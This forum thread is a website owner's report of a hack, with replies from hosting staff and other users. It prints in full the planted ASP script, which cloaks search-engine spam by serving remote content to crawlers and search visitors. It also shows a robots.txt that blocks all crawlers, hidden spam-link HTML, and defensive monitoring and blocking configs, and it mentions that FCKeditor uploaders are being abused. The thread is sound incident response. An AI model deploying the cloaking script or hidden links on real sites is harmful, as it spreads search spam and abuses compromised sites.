Strange new folders found in my FTP not uploaded by myself

Discussion in 'TechTalk' started by zarathustra, Jan 24, 2012.

  1. zarathustra

    zarathustra Perch

    I had a big drop in internet traffic yesterday and was trying to find the reasons for it. I don't know if this is related, but I've suddenly found some new folders with code, created on the 20th January 2012, which certainly didn't come from me! They are folders with names such as "ugg boots", "men's boots" etc., each containing two pages - index.asp and page=index.asp - with the following code:


    <%
    ' Gather details of the incoming request
    user_agent=Request.ServerVariables("HTTP_USER_AGENT")
    Add_Refer=Request.ServerVariables("HTTP_REFERER")
    Add_Ref=Request.ServerVariables("QUERY_STRING")
    strHost=Request.ServerVariables("HTTP_HOST")
    path_info=Request.ServerVariables("PATH_INFO")
    ' Search-engine referrer domains the script watches for
    come_from="google.com#google.ae#google.com.ag#google.com.af#google.off.ai#google.am#google.com.ar#google.as#google.at#google.com.au#google.az#google.ba#google.com.bd#google.be#google.bg#google.com.bh#google.bi#google.com.bo#google.com.br#google.bs#google.co.bw#google.com.bz#google.ca#google.cd#google.cg#google.ch#google.ci#google.co.ck#google.cl#google.cn#google.com.co#google.co.cr#google.com.cu#google.de#google.dj#google.dk#google.dm#google.com.do#google.com.ec#google.com.eg#google.es#google.com.et#google.fi#google.com.fj#google.fm#google.fr#google.gg#google.com.gi#google.gl#google.gm#google.gr#google.com.gt#google.com.hk#google.hn#google.hr#google.ht#google.co.hu#google.co.id#google.ie#google.co.il#google.co.im#google.co.in#google.is#google.it#google.co.je#google.com.jm#google.jo#google.co.jp#google.co.ke#google.kg#google.co.kr#google.kz#google.li#google.lk#google.co.ls#google.lt#google.lu#google.lv#google.com.ly#google.co.ma#google.mn#google.ms#google.com.mt#google.mu#google.mw#google.com.mx#google.com.my#google.com.na#google.com.nf#google.com.ni#google.nl#google.no#google.com.np#google.nr#google.nu#google.co.nz#google.com.om#google.com.pa#google.com.pe#google.com.ph#google.com.pk#google.pl#google.pn#google.com.pr#google.pt#google.com.py#google.ro#google.ru#google.rw#google.com.sa#google.com.sb#google.sc#google.se#google.com.sg#google.sh#google.sk#google.sn#google.sm#google.com.sv#google.co.th#google.com.tj#google.tm#google.to#google.tp#google.com.tr#google.tt#google.com.tw#google.com.ua#google.co.ug#google.co.uk#google.com.uy#google.co.uz#google.com.vc#google.co.ve#google.vg#google.co.vi#google.com.vn#google.vu#google.ws#google.co.za#google.co.zm#google.cat#soso.com#yahoo.com#sogou.com#cache.baidu.com#google.cn#g.cn#baidu.com#tom.com#bing.com#21cn.com"
    come_array = split(come_from,"#")
    FolderRoot="dress"
    ' Search-engine crawlers are served spam content fetched from a remote server
    if check(user_agent)=true then
        url=removedurl
        HTMLCODE=GetHtml(url)
        response.Write HTMLCODE
    else
        ' Visitors who arrived via a search-engine referrer also get the remote content
        For i=0 to ubound(come_array)
            if instr(Add_Refer,come_array(i)) then
                url=removedurl
                HTMLCODE=GetHtml(url)
                response.Write HTMLCODE
                exit for
            end if
        next
        ' All other visitors are served content from another (redacted) remote URL
        url=removedurl
        HTMLCODE=GetHtml(url)
        response.Write HTMLCODE
    end if

    ' Returns true if the user agent matches one of the listed crawlers
    Function check(user_agent)
        allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
        check_agent=false
        For agenti=lbound(allow_agent) to ubound(allow_agent)
            If instr(user_agent,allow_agent(agenti))>0 then
                check_agent=true
                exit for
            end if
        Next
        check=check_agent
    End function

    ' Fetches the page at url and returns it decoded as UTF-8 text
    Public Function GetHtml(url)
        Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
        ObjXMLHTTP.Open "GET",url,False
        ObjXMLHTTP.setRequestHeader "User-Agent",url
        ObjXMLHTTP.send
        GetHtml=ObjXMLHTTP.responseBody
        Set ObjXMLHTTP=Nothing
        set objStream = Server.CreateObject("Adodb.Stream")
        objStream.Type = 1
        objStream.Mode = 3
        objStream.Open
        objStream.Write GetHtml
        objStream.Position = 0
        objStream.Type = 2
        objStream.Charset = "UTF-8"
        GetHtml = objStream.ReadText
        objStream.Close
    End Function
    %>



    I have changed my login password and FTP password to something much more secure. Is there anything else I need to do to prevent this hacker from accessing my account?
  2. zarathustra

    zarathustra Perch

    Just to say, it seems most of the damage was done by the hackers changing my robots.txt and blocking all search engines from my site. I've restored the file, and hope that it gets picked up by the bots soon and that my website goes back to its previous standing.
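
    For reference, in case anyone else gets hit by this: a robots.txt that blocks every crawler only needs a couple of lines, while a harmless replacement should disallow nothing. The lines below are just an illustration, not the exact file the hackers left:

        # hostile version: tells every bot to stay away from the whole site
        User-agent: *
        Disallow: /

        # harmless replacement: disallows nothing
        User-agent: *
        Disallow: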
  3. bro

    bro Perch

    I had my fair share of hacked servers last year, also mostly from Chinese SEO bastards, and gave up trying to figure out how they got in. I'm fairly sure it wasn't FTP (insecure as plain FTP is compared to SFTP over SSH), and vulnerable CMSs weren't a factor on the hacked sites either. Support reckoned it might be down to FrontPage, but we never really got to the bottom of it.

    Now I automatically scan each site every day using a script to look for file changes. It's not foolproof, but it will at least report every changed file on a site as long as hackers haven't hacked the test script, too... my sites are small enough, and I know them well enough, to quickly spot which files might legitimately change and which do not. Crude, but it works... and better than discovering changes when a client comes complaining.
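
    Something along these lines is all it takes. This is only a rough sketch for a Windows box using WSH/VBScript - the paths are placeholders and my real script does a bit more - comparing each file's size and timestamp against a snapshot from the previous run and reporting anything new or changed:

        ' checkchanges.vbs - run daily with: cscript //nologo checkchanges.vbs
        Option Explicit

        Const SITE_ROOT = "C:\sites\example"              ' placeholder: local copy or web root
        Const SNAPSHOT  = "C:\sites\example-snapshot.txt" ' placeholder: where the last run's state lives

        Dim fso, dict, ts, out, row, parts
        Set fso  = CreateObject("Scripting.FileSystemObject")
        Set dict = CreateObject("Scripting.Dictionary")

        ' Load the previous snapshot (path|size|modified), if there is one
        If fso.FileExists(SNAPSHOT) Then
            Set ts = fso.OpenTextFile(SNAPSHOT, 1)
            Do While Not ts.AtEndOfStream
                row = ts.ReadLine
                parts = Split(row, "|")
                If UBound(parts) = 2 Then dict(parts(0)) = parts(1) & "|" & parts(2)
            Loop
            ts.Close
        End If

        ' Walk the tree, report anything new or changed, and write a fresh snapshot
        Set out = fso.CreateTextFile(SNAPSHOT, True)
        Walk fso.GetFolder(SITE_ROOT)
        out.Close

        Sub Walk(folder)
            Dim f, sf, sig
            For Each f In folder.Files
                sig = f.Size & "|" & f.DateLastModified
                If Not dict.Exists(f.Path) Then
                    WScript.Echo "NEW:     " & f.Path
                ElseIf dict(f.Path) <> sig Then
                    WScript.Echo "CHANGED: " & f.Path
                End If
                out.WriteLine f.Path & "|" & sig
            Next
            For Each sf In folder.SubFolders
                Walk sf
            Next
        End Sub

    It only looks at sizes and last-modified dates, so it can be fooled, but it is cheap to run every day and catches the obvious stuff.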

    I also blocked a lot of IP ranges. None of my sites have any legitimate traffic from China, Ukraine, Russia, and a whole bunch of other hacker havens (does anyone?), so I blocked all traffic from those IPs as they came up until they disappeared from stats. It's extremely laborious, but for a couple of important customers it was worthwhile. Chinese and eastern European hackers operate from US cloud servers, too, so it's not a total solution.
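
    For anyone on IIS 7 or later wanting to do that blocking per site rather than at the firewall: something like the web.config below works, assuming your host has the IP and Domain Restrictions module installed and the ipSecurity section unlocked. The addresses here are just documentation placeholders, not real ranges - substitute whatever shows up in your own logs:

        <configuration>
          <system.webServer>
            <security>
              <ipSecurity allowUnlisted="true">
                <!-- placeholder ranges; replace with the ranges seen in your logs -->
                <add ipAddress="203.0.113.0" subnetMask="255.255.255.0" allowed="false" />
                <add ipAddress="198.51.100.0" subnetMask="255.255.255.0" allowed="false" />
              </ipSecurity>
            </security>
          </system.webServer>
        </configuration>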
  4. Mio

    Mio Perch

    Hi Bro,
    Would you mind sharing this script? I'd like to give it a try.... TNX
    :)

  5. zarathustra

    zarathustra Perch

    I'd love to know how they did it; my guess is my password wasn't secure enough, so that's all changed. I found a strange little log file (most of mine are huge in size) around the date the hack took place. Some of it reads:

    GET /goose.asp key=real%20goose%20jackets&key2=2080&key3=1192 200 0 24453 277 297 HTTP/1.1 Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)

    Amongst other files, I found a goose.asp file. Google's webmaster tools now seem to think that the most popular keywords for my site are goose, jacket, canada and parka (my site is art related!). I've lost 75% of my normal traffic (I imagine because the robots.txt blocked Googlebot and all the other bots), and I just hope Google will reindex everything correctly soon and that my site will go back to where it was in the search engines. Just a nightmare!

    I will be checking my site on a regular basis too. :)
  6. Stephen

    Stephen US Operations Staff Member

    fckeditor on any domain?

    I have seen fckeditor getting SLAMMED with uploads like this over the last few weeks. I mean non-stop; if I could watch a live aggregate log on the server, I know there would be something happening with fckeditor at least once a minute.

    All the sites with fckeditor embedded are really, really getting hit - whether it sits in the main folder or in admin folders. Some installs even allow direct access to it behind what looks like a secure login form, because the sample uploader scripts it ships with can be reached directly. Many times the bots are scanning even hand-coded apps that use it, and can find them through plain guesswork and dictionary-type requests.

    This is far from the only way they get in, but fckeditor has lately been one KEY reason.

    Also, if your site allows uploads at all, I'd recommend putting in a ticket for us to set the upload folder to no script access at all. That way your script can still read from that folder for thumbnails etc., but no script that ends up inside it will execute, even if someone manages to bypass whatever restrictions you have limiting uploads to bmp/jpg/gif/png etc. We are doing this on some sites that we see getting hit hard through gallery apps with an images folder for uploads - we've found dozens of asp files sitting in those folders, uploaded to hack the sites, because the insecure uploader let asp/asp.net/php pages through (and even with restrictions in place they can sometimes bypass them with trickery) - so the no-execute setting works well to stop them.
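
    We normally make this change at the server level when you put the ticket in, but for reference, on IIS 7+ the per-folder equivalent is roughly a web.config dropped into the upload folder itself that treats everything in it as static content. It only works if the handlers section (and its accessPolicy attribute) isn't locked at the server level - on shared hosting it often is, hence the ticket:

        <configuration>
          <system.webServer>
            <!-- read only: uploaded asp/aspx/php files are served as plain files, never executed -->
            <handlers accessPolicy="Read" />
          </system.webServer>
        </configuration>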
  7. zarathustra

    zarathustra Perch

    I haven't heard of fckeditor before now - it's not something I use, nor do my sites allow uploads.
    I hadn't spotted it before, because the hack dates were different and they hadn't inserted new folders or pages, but I've now checked my other sites, and some of my existing pages on them have been replaced with versions that include the spammer's links. It doesn't change the presentation of the page itself, which is why I didn't pick up on it right away. I'm in the process of re-uploading the original pages and choosing some new passwords.
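
    For anyone checking their own pages for the same thing: the injected links in these attacks are typically hidden so they don't change how the page renders, along the lines of the snippet below (the domains are just placeholders, not what I actually found). Searching the source for display:none or for outbound links you don't recognise is a quicker way to spot it than looking at the page in a browser:

        <!-- illustrative only: spam links hidden from visitors but visible to crawlers -->
        <div style="display:none">
            <a href="http://spam-example.com/ugg-boots">ugg boots</a>
            <a href="http://spam-example.com/canada-goose-jackets">canada goose jackets</a>
        </div>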
  8. zarathustra

    zarathustra Perch

    In another of my websites, one that didn't seem to be affected at all, I've found something in the top root directory: five files - .statspasswd, .bash_logout, .bashrc, .bash_profile and index.html.
    These were placed there on the 24th January this year. The .statspasswd file features my login, but the password is a seemingly random string of numbers and characters that bears no resemblance to any of my actual passwords.

    The index file says that my website is down for 24 hours whilst maintenance is being carried out.
  9. tanmaya

    tanmaya APAC Operations Staff Member

    .statspasswd is password protection for access to website stats; the password in it is stored as an encrypted hash, which is why it looks nothing like any password you actually use.
    .bash_logout, .bashrc and .bash_profile are system files, used in case of shell access.
    index.html - if you are not sure about it, it can be deleted.
  10. zarathustra

    zarathustra Perch

    Thanks Tanmaya. I hadn't updated that website in some time, but those files all appeared on the 24th January according to my FTP software, the same date and time some of my websites got hacked.
  11. tanmaya

    tanmaya APAC Operations Staff Member

    Are you sure you had 'show hidden folders and files' (or its equivalent) enabled in your FTP software before this date?
    I'm asking because any file starting with a period "." is considered a hidden file in Linux, so those files may have been there all along and only become visible now.
  12. zarathustra

    zarathustra Perch

    Normally they are hidden, so I'm not sure why they appeared this time.
    I've now removed all the junk links from the hacker, and changed my database, login and FTP passwords. Hopefully that's enough, but I'll keep a daily eye peeled.
  13. Stephen

    Stephen US Operations Staff Member

    Sounds good :)
